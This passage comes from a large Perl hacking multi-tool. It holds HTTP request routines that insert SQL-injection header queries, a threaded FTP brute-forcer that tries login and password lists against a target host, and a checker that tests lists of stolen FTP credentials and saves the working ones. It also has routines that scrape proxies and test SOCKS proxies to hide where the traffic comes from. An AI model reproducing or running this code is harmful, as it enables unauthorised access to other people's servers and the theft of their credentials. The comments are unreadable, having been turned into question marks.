10011.            . "Referer: " . $referer . "\r\n"
10012.            . "Accept: */*\r\n"
10013.            . "User-Agent: $user_agent\r\n"
10014.            . "Content-Type: application/x-www-form-urlencoded\n"
10015.            . "Content-Length: $lsd\n"
10016.            . "Connection: close\n\n"
10017.            . $sql_post ."\n";
10018.     }
10019.      $res = socks_get();
10020.      if ($test_mode==1) {print $res}
10021.    }
10022. } else {
10023.    $res = req($host, $current, 'GET', 0, $ck1);
10024.    if ($test_mode==1) {print $res}
10025. }
10026. } else {
10027.    use LWP::Simple;
10028.    $res = get($current);
10029.    if ($test_mode==1) {print $res}
10030. }
10031.   return  $res;
10032. }
10033. }
10034. sub scan_url_HEADER {
10035. $res = "";
10036. if($current && $sql_header_query){
10037. if ($test_mode==1) {
10038.     print "===============================================\n";
10039.     print "URL: $current\n";
10040.     print "HEADER query: $sql_header_query\n";
10041.     print "===============================================\n";
10042. }
10043. if ($get_method == 0) {
10044. if ($https_flag == 0) {
10045.    if ($socks_check == 0) {
10046.        if ($use_proxy == 0) {
10047.             if ($socket=IO::Socket::INET->new( PeerAddr => $host, PeerPort => 80, PeerProto => 'tcp', TimeOut => $timeout)) {
10048.                 print $socket "$method $current HTTP/1.$http_protocol\n";
10049.                 print $socket "Host: $host\n";
10050.                 if ($cookie) {
10051.                     print $socket "Cookie: $cookie\n";
10052.                 }
10053.                 print $socket "Accept: */*\n";
10054.                 if ($referer) {
10055.                     print $socket "Http-Referer: $referer\n";
10056.                 }
10057.                 if ($user_agent) {
10058.                     print $socket "User-Agent: $user_agent\n";
10059.                 }
10060.                if ($sql_header) {
10061.                     print $socket "$sql_header_query\n";
10062.                 }
10063.                 print $socket "Pragma: no-cache\n";
10064.                 print $socket "Cache-Control: no-cache\n";
10065.                 print $socket "Content-Type: application/x-www-form-urlencoded\n";
10066.                 print $socket "Connection: close\n\n";
10067.                 $socket->autoflush(1);
10068.                 while (<$socket>) {
10069.                    $res .= $_ while <$socket>;
10070.                 }
10071.                 close $socket;
10072.                 if ($test_mode==1) {print $res}
10073.             }
10074.        } else {
10075.             if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
10076.                 print $socket "$method $current HTTP/1.$http_protocol\n";
10077.                 print $socket "Host: $host\n";
10078.                 if ($cookie) {
10079.                     print $socket "Cookie: $cookie\n";
10080.                 }
10081.                 print $socket "Accept: */*\n";
10082.                 if ($referer) {
10083.                     print $socket "Http-Referer: $referer\n";
10084.                 }
10085.                 if ($user_agent) {
10086.                     print $socket "User-Agent: $user_agent\n";
10087.                 }
10088.                 if ($sql_header) {
10089.                     print $socket "$sql_header_query\n";
10090.                 }
10091.                 print $socket "Pragma: no-cache\n";
10092.                 print $socket "Cache-Control: no-cache\n";
10093.                 print $socket "Content-Type: application/x-www-form-urlencoded\n";
10094.                 print $socket "Connection: close\n\n";
10095.                 $socket->autoflush(1);
10096.                 while (<$socket>) {
10097.                    $res  .= $_ while <$socket>;
10098.                 }
10099.                 close $socket;
10100.                 if ($test_mode==1) {print $res}
10101.             }
10102.       }
10103.    } else {
10104.       $check_url = $current;
10105.       $check_host = $host;
10106.     if ($cookie) {
10107.         if ($sql_header) {
10108.           our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
10109.            . "Host: $check_host\r\n"
10110.            . "Cookie: $cookie\r\n"
10111.            . "Referer: " . $referer . "\r\n"
10112.            . "Accept: */*\r\n"
10113.            . "User-Agent: $user_agent\r\n"
10114.            . "Content-Type: application/x-www-form-urlencoded\n"
10115.            . "$sql_header_query\r\n"  
10116.            . "Connection: close\r\n\r\n";
10117.         } else {
10118.            our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
10119.            . "Host: $check_host\r\n"
10120.            . "Cookie: $cookie\r\n"
10121.            . "Referer: " . $referer . "\r\n"
10122.            . "Accept: */*\r\n"
10123.            . "User-Agent: $user_agent\r\n"
10124.            . "Connection: close\r\n\r\n";
10125.  
10126.         }
10127.  
10128.     } else {
10129.         if ($sql_header) {
10130.           our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
10131.            . "Host: $check_host\r\n"
10132.            . "Referer: " . $referer . "\r\n"
10133.            . "Accept: */*\r\n"
10134.            . "User-Agent: $user_agent\r\n"
10135.            . "Content-Type: application/x-www-form-urlencoded\n"
10136.            . "$sql_header_query\r\n"  
10137.            . "Connection: close\r\n\r\n";
10138.         } else {
10139.            our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
10140.            . "Host: $check_host\r\n"
10141.            . "Referer: " . $referer . "\r\n"
10142.            . "Accept: */*\r\n"
10143.            . "User-Agent: $user_agent\r\n"
10144.            . "Connection: close\r\n\r\n";
10145.  
10146.         }
10147.     }
10148.      $res = socks_get();
10149.      if ($test_mode==1) {print $res}
10150.    }
10151. } else {
10152.    $res = req($host, $current, 'GET', 0, $ck1);
10153.    if ($test_mode==1) {print $res}
10154. }
10155. } else {
10156.    use LWP::Simple;
10157.    $res = get($current);
10158.    if ($test_mode==1) {print $res}
10159. }
10160.   return  $res;
10161. }
10162. }
10163. sub scan_url {
10164.        $res = "";
10165. if($current){
10166. if ($test_mode==1) {
10167.     print "===============================================\n";
10168.     print "URL: $current\n";
10169.     print "===============================================\n";
10170. }
10171. if ($get_method == 0) {
10172. if ($https_flag == 0) {
10173.    if ($socks_check == 0) {
10174.        if ($use_proxy == 0) {
10175.             if ($socket=IO::Socket::INET->new( PeerAddr => $host, PeerPort => 80, PeerProto => 'tcp', TimeOut => $timeout)) {
10176.                 print $socket "$method $current HTTP/1.$http_protocol\n";
10177.                 print $socket "Host: $host\n";
10178.                 if ($cookie) {
10179.                     print $socket "Cookie: $cookie\n";
10180.                 }
10181.                 print $socket "Accept: */*\n";
10182.                 if ($referer) {
10183.                     print $socket "Http-Referer: $referer\n";
10184.                 }
10185.                 if ($user_agent) {
10186.                     print $socket "User-Agent: $user_agent\n";
10187.                 }
10188.                 print $socket "Pragma: no-cache\n";
10189.                 print $socket "Cache-Control: no-cache\n";
10190.                 print $socket "Connection: close\n\n";
10191.                 $socket->autoflush(1);
10192.                 while (<$socket>) {
10193.                    $res .= $_ while <$socket>;
10194.                 }
10195.                 close $socket;
10196.                 if ($test_mode==1) {print $res}
10197.             }
10198.        } else {
10199.             if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
10200.                 print $socket "$method $current HTTP/1.$http_protocol\n";
10201.                 print $socket "Host: $host\n";
10202.                 if ($cookie) {
10203.                     print $socket "Cookie: $cookie\n";
10204.                 }
10205.                 print $socket "Accept: */*\n";
10206.                 if ($user_agent) {
10207.                     print $socket "User-Agent: $user_agent\n";
10208.                 }
10209.                 if ($sql_header) {
10210.                     print $socket "$sql_header_query\n";
10211.                 }
10212.                 print $socket "Pragma: no-cache\n";
10213.                 print $socket "Cache-Control: no-cache\n";
10214.                 print $socket "Connection: close\n\n";
10215.                 $socket->autoflush(1);
10216.                 while (<$socket>) {
10217.                    $res  .= $_ while <$socket>;
10218.                 }
10219.                 close $socket;
10220.                 if ($test_mode==1) {print $res}
10221.             }
10222.       }
10223.    } else {
10224.       $check_url = $current;
10225.       $check_host = $host;
10226.     if ($cookie) {
10227.            our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
10228.            . "Host: $check_host\r\n"
10229.            . "Cookie: $cookie\r\n"
10230.            . "Referer: " . $referer . "\r\n"
10231.            . "Accept: */*\r\n"
10232.            . "User-Agent: $user_agent\r\n"
10233.            . "Connection: close\r\n\r\n";
10234.     } else {
10235.            our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
10236.            . "Host: $check_host\r\n"
10237.            . "Referer: " . $referer . "\r\n"
10238.            . "Accept: */*\r\n"
10239.            . "User-Agent: $user_agent\r\n"
10240.            . "Connection: close\r\n\r\n";
10241.     }
10242.      $res = socks_get();
10243.      if ($test_mode==1) {print $res}
10244.    }
10245. } else {
10246.    $res = req($host, $current, 'GET', 0, $ck1);
10247.    if ($test_mode==1) {print $res}
10248. }
10249. } else {
10250.    use LWP::Simple;
10251.    $res = get($current);
10252.    if ($test_mode==1) {print $res}
10253. }
10254.   return  $res;
10255. }
10256. }
10257. sub grab_proxy {
10258.        $res = "";
10259.        if ($use_proxy == 0) {
10260.             if ($socket=IO::Socket::INET->new( PeerAddr => $host, PeerPort => 80, PeerProto => 'tcp', TimeOut => $timeout)) {
10261.                 print $socket "$method $current HTTP/1.$http_protocol\n";
10262.                 print $socket "Host: $host\n";
10263.                 if ($cookie) {
10264.                     print $socket "Cookie: $cookie\n";
10265.                 }
10266.                 print $socket "Accept: */*\n";
10267.                 if ($referer) {
10268.                     print $socket "Http-Referer: $referer\n";
10269.                 }
10270.                 if ($user_agent) {
10271.                     print $socket "User-Agent: $user_agent\n";
10272.                 }
10273.                 print $socket "Pragma: no-cache\n";
10274.                 print $socket "Cache-Control: no-cache\n";
10275.                 print $socket "Connection: close\n\n";
10276.                 $socket->autoflush(1);
10277.                 while (<$socket>) {
10278.                    $res .= $_ while <$socket>;
10279.                 }
10280.                 close $socket;
10281.                 my @ips = $res =~ /([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+\:[0-9]+)/g;
10282.                 my $str = 0;
10283.                 while ( <@ips>){
10284.                     print $_,"\n";
10285.                     if ($_) {print FILE1 $_,"\n"}
10286.                     $str++;
10287.                 }
10288.                 print "-----------------------------------\n";
10289.                 print "From $host - $str proxy\n";
10290.                 print "-----------------------------------\n";
10291.             }
10292.        } else {
10293.             if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
10294.                 print $socket "$method $current HTTP/1.$http_protocol\n";
10295.                 print $socket "Host: $host\n";
10296.                 if ($cookie) {
10297.                     print $socket "Cookie: $cookie\n";
10298.                 }
10299.                 print $socket "Accept: */*\n";
10300.                 if ($referer) {
10301.                     print $socket "Http-Referer: $referer\n";
10302.                 }
10303.                 if ($user_agent) {
10304.                     print $socket "User-Agent: $user_agent\n";
10305.                 }
10306.                 print $socket "Pragma: no-cache\n";
10307.                 print $socket "Cache-Control: no-cache\n";
10308.                 print $socket "Connection: close\n\n";
10309.                 $socket->autoflush(1);
10310.                 while (<$socket>) {
10311.                    $res .= $_ while <$socket>;
10312.                 }
10313.                 close $socket;
10314.                 my @ips = $res =~ /([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+\:[0-9]+)/g;
10315.                 my $str = 0;
10316.                 while ( <@ips>){
10317.                     print $_,"\n";
10318.                     if ($_) {print FILE1 $_,"\n"}
10319.                     $str++;
10320.                 }
10321.                 print "-----------------------------------\n";
10322.                 print "From $host - $str proxy\n";
10323.                 print "-----------------------------------\n";
10324.             }
10325.       }
10326. }
10327. ## FTP checker ##
10328. if ($choice == 10) {
10329.   open( FILE1, ">>" . $ftp_save); # ???? ??? ?????? ???????????
10330.   print "FTP checker starting, wait please....\n";
10331.   print "--------------------------------------\n";
10332.   open(FILE99, "<", $ftp_list);
10333.   while(<FILE99>) {
10334.     chomp;
10335.     if ($_) {push(@ftp_list, $_);}
10336.   }
10337.   close(FILE99);
10338.   $size = @ftp_list;
10339.   $thr500 = $kol_threads; # ???-?? ???????
10340.   $num = -1; # ?? ????????
10341.   $good = 0;
10342.   print "Threads - $kol_threads\n";
10343.   print "FTP file - ". $ftp_list . " [" . $size ."] records\n";
10344.   print "FTP-good file - ". $ftp_save . "\n";
10345.   print "FTP default port - ". $ftp_def_port . "\n";
10346.   print "FTP timeout - ". $timeout . " sec.\n";
10347.   print "Pause - ". $pause . " sec.\n";
10348.   print "--------------------------------------\n";
10349.   for(0..$thr500) {
10350.        $trl500[$_] = threads->create(\&gets500);
10351.   }
10352.   for(0..$thr500) {
10353.        $trl500[$_]->join;
10354.   }
10355.   sub gets500 {
10356.             $| = 1;
10357.             while ($num<$size) {
10358.                { lock($num);
10359.                $num++; }
10360.                $current = $ftp_list[$num];
10361.                $current =~ /^ftp:\/\/?(.*):(.*)\@(.*):(\d+)/img;
10362.                $login = $1;
10363.                $pass  = $2;
10364.                $host4 = $3;
10365.                $port4 = $4;
10366.                if (!$port4) {$port4 = $ftp_def_port;}
10367.                if ($host4) {
10368.                    if ($sock =IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host4,PeerPort=>$port4,TimeOut => $timeout)) {
10369.                         $sock_res = "";
10370.                         $sock_res = <$sock>;
10371.                         print $sock "USER $login" . $CRLF;
10372.                         $sock_res = <$sock>;
10373.                         print $sock "PASS $pass" . $CRLF;
10374.                         $sock_res = <$sock>;
10375.                         if ($sock_res !~ /230\s/) {
10376.                              close($sock);
10377.                         } else {
10378.                              $good++;
10379.                              print "                   FTP good - " . $good . "\r";
10380.                              if ($current) {print FILE1 "  "  . $current . "\n"}
10381.                              close($sock);
10382.                         }
10383.                     }
10384.                 }
10385.                print $num . "\r";
10386.                sleep $pause;
10387.  
10388.             }
10389.  }
10390.  print "----------\n";
10391.  print "Saved in " . $ftp_save . "\n";
10392.  close(FILE1);
10393.  goto START_global;
10394. }
10395. ## FTP bruter ##
10396. if ($choice == 11) {
10397.    print "----------------------------------------------------------------------------\n";
10398.    print "                    Choose mode:\n";
10399.    print "----------------------------------------------------------------------------\n";
10400.    print " [1] Login:password FTP brute - file [$ftp_login_pass_file]\n";
10401.    print " [2] Know FTP login, brute passwords - file [$ftp_pass_file]\n";
10402.    print " [3] Know FTP password, brute logins - file [$ftp_login_file]\n";
10403.    print "----------------------------------------------------------------------------\n";
10404.    $choice = <STDIN>;
10405.    chomp $choice;
10406.    print "Your choice: $choice\n";
10407.    if ($choice == 1) {
10408.         open( FILE1, ">>" . "z_" . $ftp_host . ".txt"); # ???? ??? ?????? ???????????
10409.         print "--------------------------------------\n";
10410.         print "FTP bruter starting, wait please....\n";
10411.         print "--------------------------------------\n";
10412.         open(FILE99, "<", $ftp_login_pass_file);
10413.         while(<FILE99>) {
10414.            chomp;
10415.            if ($_) {push(@ftp_login_pass_b, $_);}
10416.         }
10417.         close(FILE99);
10418.         $size = @ftp_login_pass_b;
10419.         $thr500 = $kol_threads; # ???-?? ???????
10420.         $num = -1; # ?? ????????
10421.         $good = 0;
10422.         print "Threads - $kol_threads\n";
10423.         print "FTP login:pass file - ". $ftp_login_pass_file . " [" . $size ."] records\n";
10424.         print "FTP save file - z_" . $ftp_host . ".txt\n";
10425.         print "FTP host - ". $ftp_host . "\n";
10426.         print "FTP port - ". $ftp_def_port_b . "\n";
10427.         print "FTP timeout - ". $timeout . " sec.\n";
10428.         print "Pause - ". $pause . " sec.\n";
10429.         print "--------------------------------------\n";
10430.         for(0..$thr500) {
10431.             $trl500[$_] = threads->create(\&gets511);
10432.         }
10433.         for(0..$thr500) {
10434.             $trl500[$_]->join;
10435.         }
10436.         sub gets511 {
10437.             $| = 1;
10438.             while ($num<$size) {
10439.                { lock($num);
10440.                $num++; }
10441.                $current = $ftp_login_pass_b[$num];
10442.                ($login,$pass) = split(/$ftp_login_pass_del/,$current);
10443.                    if ($sock =IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$ftp_host,PeerPort=>$ftp_def_port_b,TimeOut => $timeout)) {
10444.                         $sock_res = "";
10445.                         $sock_res = <$sock>;
10446.                         print $sock "USER $login" . $CRLF;
10447.                         $sock_res = <$sock>;
10448.                         print $sock "PASS $pass" . $CRLF;
10449.                         $sock_res = <$sock>;
10450.                         if ($sock_res !~ /230\s/) {
10451.                              close($sock);
10452.                         } else {
10453.                              print "\n ---> FIND - " . $current . "\n";
10454.                              print FILE1 "  ftp://"  . $current . "@" . $ftp_host . ":" . $ftp_def_port_b . "\n";
10455.                              close($sock);
10456.                              print "----------\n";
10457.                              print "Saved in " . "z_" . $ftp_host . ".txt\n";
10458.                              close(FILE1);
10459.                              exit;
10460.  
10461.                         }
10462.                     }
10463.                print $num . "\r";
10464.                sleep $pause;
10465.  
10466.             }
10467.        }
10468.    print "----------\n";
10469.    print "Cant' find...\n";
10470.    close(FILE1);
10471.    goto START_global;
10472.    }# end choice 1
10473.    if ($choice == 2) {
10474.         open( FILE1, ">>" . "z_" . $ftp_host . ".txt"); # ???? ??? ?????? ???????????
10475.         print "--------------------------------------\n";
10476.         print "FTP bruter starting, wait please....\n";
10477.         print "--------------------------------------\n";
10478.         open(FILE99, "<", $ftp_pass_file);
10479.         while(<FILE99>) {
10480.            chomp;
10481.            if ($_) {push(@ftp_pass_b, $_);}
10482.         }
10483.         close(FILE99);
10484.         $size = @ftp_pass_b;
10485.         $thr500 = $kol_threads; # ???-?? ???????
10486.         $num = -1; # ?? ????????
10487.         $good = 0;
10488.         print "Threads - $kol_threads\n";
10489.         print "FTP passwords file - ". $ftp_pass_file . " [" . $size ."] records\n";
10490.         print "FTP save file - z_" . $ftp_host . ".txt\n";
10491.         print "FTP host - ". $ftp_host . "\n";
10492.         print "FTP port - ". $ftp_def_port_b . "\n";
10493.         print "FTP timeout - ". $timeout . " sec.\n";
10494.         print "Pause - ". $pause . " sec.\n";
10495.         print "--------------------------------------\n";
10496.         $login = $ftp_login;
10497.         print "--------------------------------------\n";
10498.         print "FTP login: [$login] Start password brute... \n";
10499.         print "--------------------------------------\n";
10500.         for(0..$thr500) {
10501.             $trl500[$_] = threads->create(\&gets512);
10502.         }
10503.         for(0..$thr500) {
10504.             $trl500[$_]->join;
10505.         }
10506.         sub gets512 {
10507.             $| = 1;
10508.             while ($num<$size) {
10509.                { lock($num);
10510.                $num++; }
10511.                $pass = $ftp_pass_b[$num];
10512.                    if ($sock =IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$ftp_host,PeerPort=>$ftp_def_port_b,TimeOut => $timeout)) {
10513.                         $sock_res = "";
10514.                         $sock_res = <$sock>;
10515.                         print $sock "USER $login" . $CRLF;
10516.                         $sock_res = <$sock>;
10517.                         print $sock "PASS $pass" . $CRLF;
10518.                         $sock_res = <$sock>;
10519.                         if ($sock_res !~ /230\s/) {
10520.                              close($sock);
10521.                         } else {
10522.                              print "\n ---> FIND - " . $pass . "\n";
10523.                              print FILE1 "  ftp://"  . $login . ":" . $pass . "@" . $ftp_host . ":" . $ftp_def_port_b . "\n";
10524.                              close($sock);
10525.                              print "----------\n";
10526.                              print "Saved in " . "z_" . $ftp_host . ".txt\n";
10527.                              close(FILE1);
10528.                              exit;
10529.                         }
10530.                    }
10531.                print $num . "\r";
10532.                sleep $pause;
10533.  
10534.             }
10535.        }
10536.    print "----------\n";
10537.    print "Cant' find...\n";
10538.    close(FILE1);
10539.    goto START_global;
10540.    }# end choice 2
10541.    if ($choice == 3) {
10542.         open( FILE1, ">>" . "z_" . $ftp_host . ".txt"); # ???? ??? ?????? ???????????
10543.         print "--------------------------------------\n";
10544.         print "FTP bruter starting, wait please....\n";
10545.         print "--------------------------------------\n";
10546.         open(FILE99, "<", $ftp_login_file);
10547.         while(<FILE99>) {
10548.            chomp;
10549.            if ($_) {push(@ftp_login_b, $_);}
10550.         }
10551.         close(FILE99);
10552.         $size = @ftp_login_b;
10553.         $thr500 = $kol_threads; # ???-?? ???????
10554.         $num = -1; # ?? ????????
10555.         $good = 0;
10556.         print "Threads - $kol_threads\n";
10557.         print "FTP logins file - ". $ftp_login_file . " [" . $size ."] records\n";
10558.         print "FTP save file - z_" . $ftp_host . ".txt\n";
10559.         print "FTP host - ". $ftp_host . "\n";
10560.         print "FTP port - ". $ftp_def_port_b . "\n";
10561.         print "FTP timeout - ". $timeout . " sec.\n";
10562.         print "Pause - ". $pause . " sec.\n";
10563.         print "--------------------------------------\n";
10564.         $pass = $ftp_pass;
10565.         print "--------------------------------------\n";
10566.         print "FTP pass: [$pass] Start login brute... \n";
10567.         print "--------------------------------------\n";
10568.         for(0..$thr500) {
10569.             $trl500[$_] = threads->create(\&gets513);
10570.         }
10571.         for(0..$thr500) {
10572.             $trl500[$_]->join;
10573.         }
10574.         sub gets513 {
10575.             $| = 1;
10576.             while ($num<$size) {
10577.                { lock($num);
10578.                $num++; }
10579.                $login = $ftp_login_b[$num];
10580.                    if ($sock =IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$ftp_host,PeerPort=>$ftp_def_port_b,TimeOut => $timeout)) {
10581.                         $sock_res = "";
10582.                         $sock_res = <$sock>;
10583.                         print $sock "USER $login" . $CRLF;
10584.                         $sock_res = <$sock>;
10585.                         print $sock "PASS $pass" . $CRLF;
10586.                         $sock_res = <$sock>;
10587.                         if ($sock_res !~ /230\s/) {
10588.                              close($sock);
10589.                         } else {
10590.                              print "\n ---> FIND - " . $login . "\n";
10591.                              print FILE1 "  ftp://"  . $login . ":" . $pass . "@" . $ftp_host . ":" . $ftp_def_port_b . "\n";
10592.                              close($sock);
10593.                              print "----------\n";
10594.                              print "Saved in " . "z_" . $ftp_host . ".txt\n";
10595.                              close(FILE1);
10596.                              exit;
10597.                         }
10598.                    }
10599.                print $num . "\r";
10600.                sleep $pause;
10601.  
10602.             }
10603.        }
10604.    print "----------\n";
10605.    print "Cant' find...\n";
10606.    close(FILE1);
10607.    goto START_global;
10608.    }# end choice 3
10609.  
10610. }
10611. ## PROXY checker ##
10612. if ($choice == 12) {
10613.   open( FILE1, ">>" . $proxy_save); # ???? ??? ?????? ???????????
10614.   print "PROXY checker starting, wait please....\n";
10615.   print "--------------------------------------\n";
10616.   open(FILE100, "<", $proxy_list);
10617.   while(<FILE100>) {
10618.     chomp;
10619.     if ($_) {push(@proxy_list, $_);}
10620.   }
10621.   close(FILE100);
10622.   $size = @proxy_list;
10623.   $thr501 = $kol_threads; # ???-?? ???????
10624.   $num = -1; # ?? ????????
10625.   $good = 0;
10626.   print "Threads - $kol_threads\n";
10627.   print "PROXY file - ". $proxy_list . " [" . $size ."] records\n";
10628.   print "PROXY-good file - ". $proxy_save . "\n";
10629.   print "PROXY timeout - ". $timeout . " sec.\n";
10630.   print "Pause - ". $pause . " sec.\n";
10631.   print "--------------------------------------\n";
10632.   for(0..$thr501) {
10633.        $trl501[$_] = threads->create(\&gets501);
10634.   }
10635.   for(0..$thr501) {
10636.        $trl501[$_]->join;
10637.   }
10638.   sub gets501 {
10639.             $| = 1;
10640.             while ($num<$size) {
10641.                { lock($num);
10642.                $num++; }
10643.                $current_proxy = $proxy_list[$num];
10644.                ($current_proxy_host,$current_proxy_port) = split(/:/,$current_proxy);
10645.                if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
10646.                              $good++;
10647.                              print "                   PROXY good - " . $good . "\r";
10648.                              if ($current_proxy) {print FILE1 "  "  . $current_proxy . "\n"}
10649.                              close($sock);
10650.                }
10651.             }
10652.                print $num . "\r";
10653.                sleep $pause;
10654.  
10655.  }
10656.  print "----------\n";
10657.  print "Saved in " . $proxy_save . "\n";
10658.  close(FILE1);
10659.  goto START_global;
10660. }
10661. ## Proxy grabber ##
10662. if ($choice == 13) {
10663.   open( FILE1, ">>" . $proxy_list); # ???? ??? ?????? ???????????
10664.   open(FILE, "<", $proxy_site_list);
10665.   while(<FILE>) {
10666.       chomp;
10667.       if ($_) {push(@proxy_grab, $_);}
10668.   }
10669.   close(FILE);
10670.   $size = @proxy_grab;
10671.   print "Sites with proxy - $size\n";
10672.   print "--------------------------\n";
10673.   $thr = $kol_threads; # ???-?? ???????
10674.   $num = -1; # ?? ????????
10675.   for(0..$thr) {
10676.         $trl[$_] = threads->create(\&gets3000);
10677.   }
10678.   for(0..$thr) {
10679.         $trl[$_]->join;
10680.   }
10681.   sub gets3000 {
10682.         $| = 1;
10683.         while ($num<$size) {
10684.             { lock($num);
10685.             $num++; }
10686.             $current = $proxy_grab[$num];
10687.             $current =~ /^http:\/\/?([^\/]+)/i;
10688.             $host = $1;
10689.             $content = grab_proxy();
10690.             print $num . "\r";
10691.             sleep $pause;
10692.         }
10693.      }
10694.      print "----------\n";
10695.      print "Saved in " . $proxy_list . "\n";
10696.      close(FILE1);
10697.      goto START_global;
10698. }
10699.  
10700. if ($choice == 14) {
10701.   exit;
10702. }
10703. sub gets1000 {
10704.                    my $num1 : shared;
10705.                    $thr1 = 1;
10706.                    $num1 = 0;
10707.                    %res = ();
10708.                    for(0..$thr1) {
10709.                       $trl1[$_] = threads->create(\&gets1001);
10710.                    }
10711.                    for(0..$thr1) {
10712.                       %res = (%res, %{$trl1[$_]->join});
10713.                    }
10714.                    sub gets1001 {
10715.                           $| = 1;
10716.                           $ii = 0;
10717.                           while ($num1 < $bl_lenght) {
10718.                             { lock($num1);
10719.                             $num1++; }
10720.                             $ii = $num1;
10721.                             $data = get_res();
10722.                             $hash{$ii} = $data;
10723.                             print $data;
10724.                           }
10725.                           return \%hash
10726.                   }
10727.                   return \%res;
10728.             }
10729. sub gets1005 {
10730.  
10731.                    my $num2 : shared;
10732.                    $thr2 = 10;
10733.                    $num2 = 0;
10734.                    %res1 = ();
10735.                    for(0..$thr2) {
10736.                       $trl2[$_] = threads->create(\&gets1006);
10737.                    }
10738.                    for(0..$thr2) {
10739.                       %res1 = (%res1, %{$trl2[$_]->join});
10740.                    }
10741.                    sub gets1006 {
10742.                           $| = 1;
10743.                           $ii = 0;
10744.                           while ($num2 < $bl_lenght) {
10745.                             { lock($num2);
10746.                             $num2++; }
10747.                             $ii = $num2;
10748.                             if ($bl_mode==0){
10749.                                 $data2 = get_res();
10750.                             } else {
10751.                                 $data2 = get_res1();
10752.                             }
10753.                             $hash1{$ii} = $data2;
10754.                             print $data2;
10755.                           }
10756.                           return \%hash1
10757.                   }
10758.                   return \%res1;
10759.  
10760.             }
10761. sub md5 {
10762.                    my $num3 : shared;
10763.                    $thr3 = 10;
10764.                    $num4 = 0;
10765.                    %res2 = ();
10766.                    for(0..$thr3) {
10767.                       $trl3[$_] = threads->create(\&gets1008);
10768.                    }
10769.                    for(0..$thr3) {
10770.                       %res2 = (%res2, %{$trl3[$_]->join});
10771.                    }
10772.                    sub gets1008 {
10773.                           $| = 1;
10774.                           $ii = 0;
10775.                           while ($num3 < $bl_lenght) {
10776.                             { lock($num3);
10777.                             $num3++; }
10778.                             $ii = $num3;
10779.                             $data3 = md5_turbo();
10780.                             $hash2{$ii} = $data3;
10781.                             print $data3;
10782.                           }
10783.                           return \%hash2
10784.                   }
10785.                   return \%res2;
10786.             }
10787. sub TURBO {
10788.                    my $num4 : shared;
10789.                    $thr4 = 10;
10790.                    $num4 = 0;
10791.                    %res4 = ();
10792.                    for(0..$thr4) {
10793.                       $trl4[$_] = threads->create(\&gets1009);
10794.                    }
10795.                    for(0..$thr4) {
10796.                       %res4 = (%res4, %{$trl4[$_]->join});
10797.                    }
10798.                    sub gets1009 {
10799.                           $| = 1;
10800.                           $ii = 0;
10801.                           while ($num4 < $bl_lenght) {
10802.                             { lock($num4);
10803.                             $num4++; }
10804.                             $ii = $num4;
10805.                             $data4 = get_res();
10806.                             $hash4{$ii} = $data4;
10807.                             print $data4;
10808.                           }
10809.                           return \%hash4
10810.                   }
10811.                   return \%res4;
10812.             }
10813. sub socks_check {
10814.      $check_port = 80;
10815.      $check_host = $check_url;
10816.      my $check_hostent = gethostbyname ($check_host);
10817.      our $sk4_conn = "\x04"
10818.                    . "\x01"
10819.                    . pack ('n', $check_port)
10820.                    . $check_hostent
10821.                    . "\x00";
10822.      our $sk5_conn0 = "\x05"
10823.                    . "\x01"
10824.                    . "\x00";
10825.      our $sk5_conn1 = "\x05"
10826.                     . "\x01"
10827.                     . "\x00"
10828.                     . "\x01"
10829.                     . $check_hostent
10830.                     . pack ('n', $check_port);
10831.      my @proxies;
10832.      open(FILE, "<", $socks_file);
10833.      while(<FILE>) {
10834.          chomp;
10835.          push(@proxies, $_);
10836.      }
10837.      close(FILE);
10838.      foreach my $proxy (<@proxies>) {
10839.          $sokcs_flag = 0;
10840.          my ($s_host, $s_port) = split (/:/, $proxy);
10841.          print $proxy . " - Trying SOCKS 5\n";
10842.          $res = socks5($s_host,$s_port,5);
10843.          if ($res->{'code'} == 0) {
10844.              $sokcs_flag = 5;
10845.              $temp = $s_host . ":". $s_port . ":" . $sokcs_flag;
10846.              return $temp;
10847.          }
10848.          if ($sokcs_flag == 0) {
10849.              print $proxy . " - Trying SOCKS 4\n";
10850.              $res = socks4($s_host,$s_port,5);
10851.              if ($res->{'code'} == 0) {
10852.                  $sokcs_flag = 4;
10853.                  $temp = $s_host . ":". $s_port . ":" . $sokcs_flag;
10854.                  return $temp;
10855.              }
10856.          }
10857.      }
10858.      sub send_query {
10859.           my ($sock, $query) = @_;
10860.           syswrite $sock, $query, length $query;
10861.           my ($resp, $buf);
10862.           $resp .= $buf while sysread $sock, $buf, 4098;
10863.           return $resp;
10864.      }
10865.      sub parse_content {
10866.           my $content = shift;
10867.           my %ret;
10868.           if ($content) {
10869.                ($ret{'code'}, $ret{'message'}) = (0, $content);
10870.           } else {
10871.                ($ret{'code'}, $ret{'message'}) = (-1, "");
10872.           }
10873.           return \%ret;
10874.      }
10875.      sub socks4 {
10876.           my ($proxy_host, $proxy_port, $timeout1) = @_;
10877.           my $sock = IO::Socket::INET->new (
10878.                       'PeerAddr' => $proxy_host,
10879.                       'PeerPort' => $proxy_port,
10880.                       'Proto' => 'tcp',
10881.                       'Timeout' => $timeout1
10882.                       ) or return {'code' => -1, 'message' => "Connection error: $@"};
10883.           syswrite $sock, $sk4_conn, length $sk4_conn;
10884.           my $resp;
10885.           sysread $sock, $resp, 8; # ????? ????? ?????? ???? ?????? 8 ????
10886.           return {'code' => -1, 'message' => 'Empty response'}
10887.           if length $resp == 0 or not defined $resp;
